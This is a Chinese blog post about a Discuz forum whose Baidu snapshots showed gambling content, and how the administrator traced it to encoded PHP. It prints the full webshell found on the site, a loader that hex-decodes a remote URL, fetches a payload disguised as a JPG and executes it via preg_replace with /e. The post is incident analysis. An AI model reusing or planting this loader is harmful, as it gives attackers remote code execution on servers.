博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
discuz 3.1论坛快照被百度劫持解决方案
阅读量:6060 次
发布时间:2019-06-20

本文共 1265 字,大约阅读时间需要 4 分钟。

最近很郁闷,遇到一个很棘手的问题。我们公司有个论坛在百度查看快照信息的时候全部都是博彩信息,但是打开却无博彩信息显示。在快照中查看是这样的

百度快照查看图:

 

经过思考,怀疑是网站中有网页被改动了,在某页面加了判断,如果来源为搜索引擎的抓取就显示博彩信息。但是使用editplus文件搜索如: baidu\spider\http等也无效。通过百度搜索别人也遇到相似的问题,入侵者将要写入的信息加密,通过通用的关键字是搜索不到的。就查找php的加密方法,但然肯定是可以解密的加密方法

1、base64加密

string base64_encode ( string $data )

使用 base64 对 data 进行编码。

设计此种编码是为了使二进制数据可以通过非纯 8-bit 的传输层传输,例如电子邮件的主体。

Base64-encoded 数据要比原始数据多占用 33% 左右的空间。

string base64_decode ( string $data [, bool $strict = false ] )

对 base64 编码的 data 进行解码。

参数

data -- 编码过的数据。

strict -- 如果输入的数据超出了 base64 字母表,则返回 FALSE。

 

我遇到的就是这种情况

 

2、使用对称加密方法

 

Webshell代码如下:

1
2
3
4
5
6
7
8
9
<?php
error_reporting
(0);
session_start();
header(
"Content-type:text/html;charset=utf-8"
);
if
(
empty
(
$_SESSION
[
'api'
]))
$_SESSION
[
'api'
]=
substr
(
file_get_contents
(
sprintf(
'%s?%s'
,pack(
"H*"
,
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace(
"~(.*)~ies"
,gzuncompress(
$_SESSION
[
'api'
]),null);
?>

关键看下面这句代码,

1
sprintf(
'%s?%s'
,pack(
"H*"
,'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这里执行之后其实是一张图片,解密出来的图片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

更多参考:

转载于:https://www.cnblogs.com/fogwang/p/5502499.html

你可能感兴趣的文章
这三种思维作为前端工程师应该具备
查看>>
构建更加高效的数据中心
查看>>
电商社交数据在大数据风控的应用实践
查看>>
Java深入学习系列之值传递Or引用传递?
查看>>
PaperWeekly 第十三期--最新文章解读
查看>>
石墨文档宣布获数千万元Pre-A轮融资 上线企业版
查看>>
“物联利浪”提供开源物业SaaS平台 连接业主和社区服务提供商
查看>>
骗子瞅准了摩拜“微信扫一扫”,你可能被骗走299元!
查看>>
8月2日,微软将会推出Windows 10周年更新ISO镜像
查看>>
安徽4个项目获批国家首批“互联网”智慧能源示范项目
查看>>
麦肯锡:中企跨境并购数量持续增长
查看>>
慢病管理领域,移动医疗大有可为
查看>>
关于数据中心方面的专业名词,你了解多少?
查看>>
《深入理解Android:Telephony原理剖析与最佳实践》一3.5 本章小结
查看>>
DevOps成传统行业落地Docker关键原动力
查看>>
宁夏出台新型智慧城市建设实施意见
查看>>
神威超算操作系统揭秘:十年磨一剑
查看>>
英特尔公布无人驾驶战略,后 PC 时代芯片王者之争在汽车行业打响
查看>>
大数据平台架构技术选型与场景运用
查看>>
CentOS7常用环境设置
查看>>